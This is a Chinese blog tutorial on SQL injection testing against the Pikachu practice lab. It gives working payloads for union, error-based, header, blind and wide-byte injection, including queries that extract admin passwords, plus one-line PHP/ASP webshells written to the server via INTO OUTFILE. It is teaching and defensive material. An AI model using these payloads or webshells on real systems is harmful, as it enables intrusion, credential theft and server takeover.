Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)

这篇具有很好参考价值的文章主要介绍了Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Web安全:SQL注入漏洞测试.

SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。


目录:

SQL注入测试的思想:

常见的SQL注入点类型:

常见的测试语句:

SQL 注入漏洞测试:

数字型注入(POST传参):

字符型注入(GET传参):

搜索型注入:

XX型注入:

基于 union 联合查询的信息获取:

基于 函数 报错的信息获取:

基于 insert / update 注入(账号 || 密码):

delete 注入(留言板):

Http Header注入(http 头):

基于 boolean 盲注(真 / 假):

基于 Time 盲注(时间):

利用SQL注入进行远程控制服务器:

宽字节注入:

SQL注入的防御:


免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。


SQL注入测试的思想:

主要是怎样可以闭合,数据库前面的语句。然后再去欺骗后台执行我们需要的查询语句.


常见的SQL注入点类型:

数字型:user_id=$id

字符型:user_id='$id'

搜索型:text LIKE '%{$_GET['SEARCH']}%'"

常见的测试语句:

' and 1=1 #    //单引号是闭合前面的数据(写闭合数据),因为 1=1 是真则返回是正常页面.
' and 1=2 #    //单引号是闭合前面的数据(写闭合数据),因为 1=2 是假则返回是错误页面.
" and 1=1 #    //单引号是闭合前面的数据(写闭合数据),因为 1=1 是真则返回是正常页面.
" and 1=2 #    //单引号是闭合前面的数据(写闭合数据),因为 1=2 是假则返回是错误页面.
' or 1=1 #     //返回所以信息.
" or 1=1 #     //返回所以信息.
'              //查看有没有报错.
"              //查看有没有报错.
以上测试说明:可能存在注入点.

SQL 注入漏洞测试:

数字型注入(POST传参):

$id=$_POST['id']            //模拟后台传入的参数思想
select  字段1,字段2  from  表名  where id =$id
(注意:有时候是 ” 双引号,则单引号换为双引号)

第一步:进入可能存在SQL注入的页面,点击输入 1 或 2....看看有没有返回页面信息等.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:打开 Burp Suite 工具进行抓包,然后发送给 " 重发器 " 

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第三步:在传参的后面填写  or 1=1,发送查看有没有返回这个表的所以信息.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


字符型注入(GET传参):

$uname=$_GET['username']           //模拟后台传入的参数思想
select 字段1,字段2 from 表名 where username='$uname';

第一步:进入可能存在SQL注入的页面,输入一个正常返回页面的参数和一个错误返回页面的参数.(比如:正常返回页面的参数:kobe   , 错误返回页面的参数:1)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:在页面后面填写一个字符然后跟Mysql语句 (先把前面的语句闭合),(再使用 # 注释掉后面的): aaa' or 1=1#'

语句解析:
(1)前面的 ' 单引号是闭合 Mysql数据库 的单引号.
(2)在拼写 Mysql数据库 语句时后面也要有一个 ' 单引号.
(3)想方法把后面的 ' 单引号给注释掉,在 Mysql数据库 中是使用 # 或 -- 注释. 
(注释 # 或 --后面的语句.)
(注意:有时候是 ” 双引号,则单引号换为双引号)
$uname=$_GET['username']            //模拟数据库后面的运行是这样的
select 字段1,字段2 from 表名 where username='kobe' or 1=1#';

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


搜索型注入:

select * from 表名 where 字符(username) like '%k%';
语句解析:
(1)like 是对表进行匹配性查询,匹配 % 中间含有的值,在 字符(username) 中所以含有 % 中间
的值(k)都会返回出来.

第一步:进入可能存在SQL注入的页面,输入这个正常的查询.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:查询框中输入(先把前面的语句闭合),(再使用 # 注释掉后面的):xxx%' or 1=1 # 

select * from 表名 where 字段(username) like '%xxx%' or 1=1 #%';
//模拟数据库后面的运行是这样的
select * from 表名 where 字段(username) like '%xxx%' or 1=1 #%';
语句解析:
(1)' 单引号前的数据是闭合 Mysql数据库 中的语句.( xxx%' )
(2)or 1=1 是查找这个表中所以的数据.
(3)# 或 -- 是 Mysql数据库 注释掉后面的语句.
(注意:有时候是 ” 双引号,则单引号换为双引号)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


XX型注入:

$uname=$_GET['username']           //模拟后台传入的参数思想
select 字段1,字段2 from 表名 where username=('$uname');
select 字段1,字段2 from 表名 where username=('xx') or 1=1 #');
语句解析:
(1)' 单引号前的数据是闭合 Mysql数据库 中的语句.( xx') )
(2)or 1=1 是查找这个表中所以的数据.
(3)# 或 -- 是 Mysql数据库 注释掉后面的语句.
(注意:有时候是 ” 双引号,则单引号换为双引号)

第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,输入:xx') or 1=1 #

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


基于 union 联合查询的信息获取:

union 联合查询:可以通过联合查询来查询指定的数据.
用法举例:
select username,password from user where id=1 union select 字段1,字段2 from 表名 
(联合查询的字段 数 需要和主查询一致!)
思路:对查询的结果使用 order by 按照指定的列进行排序,如果指定的列不存在,数据库会报错。
通过报错判断查询结果的列数,从而确定主查询的字段数。

order by x        //对查询的结果进行排序,按照第X列进行排序,默认数字0-9,字母a-z
Select version();        //取的数据库版本
Select database();       //取得当前的数据库
Select user();           //取得当前登录的用户

第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,再使用 order by 测试字段数有多少.(如果指定的列不存在,数据库会报错,通过报错判断查询结果的列数,从而确定主查询的字段数.)(再使用 # 注释掉后面的)

aa' order by 3 #        //报错的
aa' order by 2 #        //没有报错的

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:已经字段有几段,则把前面的语句闭合,再使用 union select 字段1,字段2... from 表名

aa' union select database(),user() #
database()        //取得当前的数据库
user()            //取得当前登录的用户

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


基于 函数 报错的信息获取:

技巧思路:
在 MYSQL 中使用一些指定的函数来制造报错,从而从报错信息中获取设定的息.
select/insert/update/delete都可以使用报错来获取信息.
背景条件:
后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端.
基于报错的信息获取---三个常用的用来报错的函数:
updatexml()         //函数是MYSQL对 XML文档 数据进行 查询和修改 的XPATH函数.
extractvalue()      //函数也是MYSQL对 XML文档 数据进行 查询 的XPATH函数。
floor()             // MYSQL 中用来 取整 的函数.
Updatexml()函数作用:改变(查找并替换)XML文档中符合条件的节点的值.
语法:UPDATEXML (xml_document, XPathstring, new_value)
第一个参数:xml_document,表中的字段名
第二个参数:XPathstring (Xpath格式的字符串),定位哪个位置
第三个参数:new_value,String格式,替换查找到的符合条件的
限制:Xpath定位必须是有效的,否则则会发生错误.

第一步:进入可能存在SQL注入的页面,随便输入一个数据,查看有没有报错的信息返回.(有报错才符合我们的条件.)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:使用基于报错: updatexml()函数(主要是替换第二个参数,把他替换为我们要查询数据使用的函数.)

kobe' and updatexml(1,version(),0) #

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

对传入的数据进行处理:
kobe' and updatexml(1,concat(0x7e,version()),0) #     //取的数据库版本
kobe' and updatexml(1,concat(0x7e,database()),0) #    //取得当前的数据库
kobe' and updatexml(1,concat(0x7e,user()),0) #        //取得当前登录的用户

0x7e 是 ~
concat()函数:传入的两个参数组合起来,然后再打印出来.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

使用limit一次一次进行获取表名:
kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) #   

// table_schema='数据库名'
// limit 0,1    只改 0 的那个数字( 0 代表第一个数据库名的名称, 1 代表第二个数据库名的名称,....)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

获取到表名后,再获取列名:
kobe' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0) #

// table_name='表名'
// limit 0,1    只改 0 的那个数字( 0 代表第一个表名的名称, 1 代表第二个表名的名称,....)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

获取到列名后,再获取数据:
kobe' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0) #
//可以获取 用户名. 

kobe' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0) #
//可以获取 用户的密码.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


基于 insert / update 注入(账号 || 密码):

模拟后台代码执行:(正常执行)
insert into member(username,pw,sex,phonenum,email,address) values('xxx',11111,2,3,4,5)

模拟后台代码执行:(注入时的执行)
insert into member(username,pw,sex,phonenum,email,address) values('xxx' or updatexml(1,concat(0x7e,version()),0) or'',11111,2,3,4,5)

insert into member(username,pw,sex,phonenum,email,address) values('xxx' or updatexml(1,concat(0x7e,user()),0) or'',11111,2,3,4,5)

insert into member(username,pw,sex,phonenum,email,address) values('xxx' or updatexml(1,concat(0x7e,database()),0) or'',11111,2,3,4,5)

第一步:进入可能存在SQL注入的页面,随便输入一个数据,查看有没有报错.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

第二步:输入命令进行测试.

xxx' or updatexml(1,concat(0x7e,version()),0) or'     //取的数据库版本

xxx' or updatexml(1,concat(0x7e,user()),0) or'        //取得当前登录的用户

xxx' or updatexml(1,concat(0x7e,database()),0) or'    //取得当前的数据库  

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


delete 注入(留言板):

后台执行的代码:
delete from message where id={$_GET['id']}

第一步:进入可能存在SQL注入的页面,随便输入一个数据.


第二步:打开 Burp Suite 对刚刚的数据进行拦截抓包,然后发送到“重发器”,找到我们输入的数据进行修改为.

1 or updatexml(1,concat(0x7e,database()),0)      //取的数据库版本

1 or updatexml(1,concat(0x7e,user()),0)         //取得当前登录的用户

1 or updatexml(1,concat(0x7e,database()),0)     //取得当前的数据库

第三步:对我们插入的数据进行转换为 URL 编码.(编码:鼠标右键点击--->转换选择-->URL-->特殊字符的URL编码)


Http Header注入(http 头):

原理及概括:
有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证)
或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等等。

会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的SQL Inject漏洞。

第一步:进入可能存在SQL注入的页面,进行登录.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:打开 Burp Suite 对刚刚浏览的数据进行发送到“重发器”中查看.(使用 User-Agent:  做测试,把他后面的删除,输入一个:' (单引号)查看有没有返回报错)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第三步:输入我们构造的语句.(自己需要的信息.)

xxx' or updatexml(1,concat(0x7e,version()),0) or'     //取的数据库版本

xxx' or updatexml(1,concat(0x7e,user()),0) or'        //取得当前登录的用户

xxx' or updatexml(1,concat(0x7e,database()),0) or'    //取得当前的数据库 

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第四步:打开 Burp Suite 对刚刚浏览的数据进行发送到“重发器”中查看.(使用 Cookie:   做测试,在用户名后面添加一个:' (单引号)查看有没有返回报错.)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第五步:输入我们构造的语句.(自己需要的信息.)

admin' and updatexml(1,concat(0x7e,version()),0) #     //取的数据库版本

admin' and updatexml(1,concat(0x7e,user()),0) #        //取得当前登录的用户

admin' and updatexml(1,concat(0x7e,database()),0) #    //取得当前的数据库 

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


基于 boolean 盲注(真 / 假):

什么是盲注以及常见的盲注类型:
在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错
此时无法在根据报错信息来进行注入的判断,这种情况下的注入,称为“盲注”

根据表现形式的不同,盲注又分为based boolean和based time两种类型

基于boolean的盲注主要表现症状:
(1)没有报错信息
(2)不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1)
(3)在正确的输入下,输入and 1=1 / and 1=2发现可以判断.

第一步:进入可能存在SQL注入的页面,输入我们构造的语句.(有没有返回正常和错误.)如果正常和错误都有,则存在注入.

kobe' and 1=1 #        //正常返回页面(真)
kobe' and 1=2 #        //错误返回页面(假)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:我们已经知道,这里存在注入点了.(所以进行测试有没有报一些我们想要的数据.)(如果手动注入取信息是比较麻烦的,建议使用工具)

kobe' and ascii(substr(database(),1,1))>113 #

ascii 是转换为 ASCLL 编码
substr 是取字符,中间的 1 是取第一个字符.
database() 是取数据库名称
>113 是转换为 ASCLL 编码大于113,则正常返回页面,如果小于 113 ,则错误返回页面.

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


基于 Time 盲注(时间):

如果说基于boolean的盲注在页面上还可以看到0 or 1的回显的话
那么基于time的盲注完全就啥都看不到了!

但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确认注入!

常用的Teat Payload:
kobe' and sleep(5)#

看看输入:kobe 和输入kobe ' and sleep(5)#的区别,从而判断这里存在based time的SQL注入漏洞

第一步:进入可能存在SQL注入的页面,输入我们构造的语句.(按F12 --> 查看网络.)

kobe' and sleep(10) #

sleep 是暂停时间. 10 是秒

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:我们已经知道,这里存在注入点了.(所以进行测试有没有报一些我们想要的数据.)(按F12 --> 查看网络.)

kobe' and if(substr(database(),1,1)='p',sleep(10),null) #

substr 是取字符,中间的 1 是取第一个字符.
database() 是取数据库名称
if 判断数据库名称第一个字符是不是 p ,如果是时间延长十秒,如果不是不延长

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


利用SQL注入进行远程控制服务器:

一句话木马是一种短小而精悍的木马客户端,隐蔽性好,且功能强大.
PHP: <?php @eval($_POST['bgxg']);?>
ASP: <%eval request("bgxg")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.ltem["bgxg"],"unsafe");%>
通过SQL漏洞·写入恶意代码:
into outfile 将select的结果写入到指定目录的1.txt中
在一些没有回显的注入中可以使用into outfile将结果写入到指定文件,然后访问获取

前提条件:
1.需要知道远程目录
2.需要远程目录有写权限
3.需要数据库开启了secure_file_priv

第一步:进入可能存在SQL注入的页面,输入我们构造的语句.

kobe' union select "<?php @eval($_GET['bgxg'])?>,2 into outfile "写入到服务器的目录/1.php" #

//outfile 是将前面的字段(一句话木马)结果输入到后面的目录中.


第二步:浏览一下这个木马  ?bgxg=phpinfo();     如果可以返回则成功写,再使用工具进行连接.


宽字节注入:

宽字节注入原理:
宽字节注入使用了转义的函数,对输入'进行了转义\'
但是可以利用反斜杠编码为%5c,然后再用%df构成(連)字绕过对 ' 的转义.
(设置编码时设置为了gbk编码)

第一步:进入可能存在SQL注入的页面,输入我们构造的语句.

kobe%df’ or 1=1#

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


第二步:打开 Burp Suite 对刚刚浏览的数据进行发送到“ 重发器 ”中查看.(重新输入刚刚的数据.)

安全测试sql注入,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,sql,网络安全,web安全,系统安全


SQL注入的防御:

(1)应尽可能用服务器的数据库权限降至最低.

(2)尽可能对进入数据库的特殊字符进行转义处理,或编码转换.

(3)尽可能在检测的时候使用专门的 SQL 注入检测工具进行检测.

(4)尽可能避免网站打印出 SQL 错误信息,比如类型错误、字段不匹配等等.

(5)尽可能在查询语句时,不要直接将用户输入变量直接拼接 SQL 语句中.(可以使用数据库提供的参数化查询接口)

      

      

学习链接:sqli基本概念和原理讲解_哔哩哔哩_bilibili文章来源地址https://www.toymoban.com/news/detail-636723.html

到了这里,关于Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 加强Web应用程序安全:防止SQL注入

    数据库在Web应用程序中存储和组织数据时起着至关重要的作用,它是存储用户信息、内容和其他应用程序数据的中央存储库。而数据库实现了高效的数据检索、操作和管理,使Web应用程序能够向用户提供动态和个性化的内容。然而,数据库和网络应用程序之间的通信不畅可能

    2024年02月14日
    浏览(43)
  • [网络安全] Windows Server 设置文件屏蔽防止黑客利用漏洞上传特定类型的非法文件(.asp .aspx .jsp .php)

    [网络安全] Windows Server 设置文件屏蔽防止黑客利用文件上传漏洞上传特定类型的非法文件(.asp .aspx .jsp .php) 我在负责网站运维期间,遇到过一次黑客利用公司网站内使用的开源文件上传工具漏洞上传非法文件(可执行脚本) 我是通过设置文件屏蔽来防止此类事件的再次发生。

    2024年02月12日
    浏览(59)
  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(45)
  • 渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

    环境:对某网站进行渗透测试。 (PHP+Mysql开发的网站,用于WEB漏洞教学和检测的) 工具:sqlmap(Kali Linux中自带or官网下载Windows版) 此次实验所涉及的sqlmap参数: 一、信息收集 二、漏洞挖掘 (1)判断网站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目标网站地址\\\" --ba

    2024年02月15日
    浏览(46)
  • web安全漏洞-SQL注入攻击实验

    实验目的 学习sql显注的漏洞判断原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 实验工具 sqlmap是用python写的开源的测试框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP,MAXDB并支持6种SQL注入手段。 实验内容 SQL注入(SQL I

    2024年02月06日
    浏览(55)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(40)
  • WEB安全之XSS漏洞与SQL注入漏洞介绍及解决方案

    这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,比较适合初学者观看。 对于防止sql注入发生,我在这里用简单拼接字符串的注入及参数化查询,如果大家对这个系列的内容感兴趣,可以在评论区告诉我! XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者

    2024年02月07日
    浏览(48)
  • 常见web安全漏洞-暴力破解,xss,SQL注入,csrf

    1,暴力破解 原理:         使用大量的认证信息在认证接口进行登录认证,知道正确为止。为提高效率一般使用带有字典的工具自动化操作         基于表单的暴力破解 --- 若用户没有安全认证,直接进行抓包破解。 验证码绕过                           on s

    2023年04月12日
    浏览(53)
  • 小迪安全25WEB 攻防-通用漏洞&SQL 读写注入&MYSQL&MSSQL&PostgreSQL

       #知识点:  1、SQL 注入-MYSQL 数据库  2、SQL 注入-MSSQL(SQL server) 数据库  3、SQL 注入-PostgreSQL 数据库  #详细点:  Access 无高权限注入点-只能猜解,还是暴力猜解           因为access的数据库是独立存在的,不存在统一管理 对账号密码进行猜解,此时只是获取到后台的操

    2024年02月20日
    浏览(58)
  • MySQL 安全及防止 SQL 注入攻击

    如果通过网页获取用户输入的数据并将其插入  MySQL  数据库,那么就有可能发生  SQL 注入攻击的安全问题 作为研发,有一条铁律需要记住,那就是 永远不要相信用户的数据,哪怕他一再承诺是安全的 SQL  注入,就是通过把  SQL  命令插入到  Web  表单递交或输入域名或页

    2024年02月02日
    浏览(61)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包